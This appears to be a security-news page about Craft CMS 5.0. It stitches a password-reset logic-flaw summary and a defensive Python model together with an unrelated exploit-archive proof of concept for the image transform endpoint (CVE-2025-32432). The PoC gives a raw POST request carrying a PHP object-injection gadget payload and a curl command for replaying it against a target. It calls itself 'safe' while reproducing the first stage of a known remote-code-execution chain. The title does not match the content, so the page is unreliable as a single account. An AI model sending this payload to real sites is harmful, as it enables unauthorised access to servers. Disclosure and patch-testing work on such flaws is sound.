Craft CMS 5.0 contained a logic flaw in its password reset mechanism.
The system would generate a valid password reset token even for disabled user accounts.
This meant an attacker could request a token for a disabled user.
The core issue was that the token was generated *before* verifying the account's enabled status.
An attacker could then use this token to change the disabled account's password.
This vulnerability could lead to account takeover or denial of service for legitimate users.
The fix involved ensuring the account is active *before* any password reset token is issued.
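Added illustration, not Craft's own code: a minimal Python model of the two orderings described above, a vulnerable request flow that mints the token before consulting the enabled flag, the corrected flow that refuses before any token exists, and a redemption step that re-checks status as defence in depth. The user table, token store and hash values are constructed for the demonstration.

```python
import secrets
import time

# Constructed user table (not Craft's schema); 'enabled' is the flag the fix must consult.
USERS = {
    "alice": {"enabled": True, "password_hash": "old-hash"},
    "bob": {"enabled": False, "password_hash": "old-hash"},
}
# token -> (username, expiry); stands in for the persisted reset token.
ISSUED = {}


def _issue_token(username, ttl=900):
    token = secrets.token_urlsafe(24)
    ISSUED[token] = (username, time.time() + ttl)
    return token


def request_reset_vulnerable(username):
    """Flawed flow: the token is minted before the account status is examined."""
    if username not in USERS:
        return None
    return _issue_token(username)  # disabled accounts receive a live token too


def request_reset_fixed(username):
    """Corrected flow: refuse before any token exists."""
    user = USERS.get(username)
    if user is None or not user["enabled"]:
        return None  # same answer as for an unknown user; nothing was minted
    return _issue_token(username)


def redeem_reset(token, new_password_hash):
    """Consume a token; re-checks the enabled flag so a stray token is still useless."""
    entry = ISSUED.pop(token, None)  # single use
    if entry is None:
        return False
    username, expiry = entry
    if time.time() > expiry or not USERS[username]["enabled"]:
        return False
    USERS[username]["password_hash"] = new_password_hash
    return True
```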
=============================================================================================================================================
| # Title : Craft CMS 5.0 Image Transform Authentication Logic Flaw |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://craftcms.com |
=============================================================================================================================================
POC :
[+] Description
A flaw in the Craft CMS image transform endpoint allows an unauthenticated attacker
to trigger backend processing without prior authentication.
While the original Metasploit module targeted RCE (CVE-2025-32432, https://packetstorm.news/files/id/190728/),
this PoC does *not* execute code, does *not* write files, and does *not* inject
payloads. It only proves that the endpoint performs internal logic operations
without authentication.
# Vulnerability Class
Authentication Bypass / Pre-Auth Backend Processing
# Impact
An attacker can:
- Trigger image transformation logic without logging in.
- Interact with backend components not intended for anonymous users.
- Validate the presence of the vulnerability safely without RCE.
=====================================================================
POC :
=====================================================================
Request :
---------
POST /index.php?p=actions/assets/generate-transform HTTP/1.1
Host: TARGET
Content-Type: application/json

{
  "assetId": 1,
  "handle": {
    "width": 100,
    "height": 100,
    "as test": {
      "class": "craft\\\\behaviors\\\\FieldLayoutBehavior",
      "__class": "yii\\\\rbac\\\\PhpManager",
      "__construct()": [
        { "itemFile": "/dev/null" }
      ]
    }
  }
}
Effect :
--------
- The server processes the transform request.
- The endpoint responds with a JSON transformation result.
- This demonstrates the pre-auth processing weakness.
- No execution, no payload, no harmful operations.
=====================================================================
How to Save & Use the PoC :
=====================================================================
1. Save the request into a file named:
craftcms_pre_auth_poc.txt
2. Use curl to replay the PoC (legal environments only):
curl -X POST \
-H "Content-Type: application/json" \
-d @craftcms_pre_auth_poc.txt \
https://TARGET/index.php?p=actions/assets/generate-transform
3. Expected safe behavior:
The server processes the request and responds with JSON even though
the attacker is not authenticated.
4. Tools that can import the PoC:
- Burp Suite Repeater
- OWASP ZAP
- Postman Raw HTTP
=====================================================================
# Recommendation
- Require authentication on all asset transformation endpoints.
- Validate input types before passing them to backend behavior handlers.
- Apply the vendor patch immediately once available.
=====================================================================
# Disclosure Timeline
- Original discovery: Orange Cyberdefense CSIRT
- Educational safe PoC adaptation: indoushka
- Status: Safe demonstration (no execution)
=====================================================================
Greetings to :
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
=====================================================================
Craft CMS 5.0 Logic Flaw
- Written by: khalil shreateh
- Category: Vulnerabilities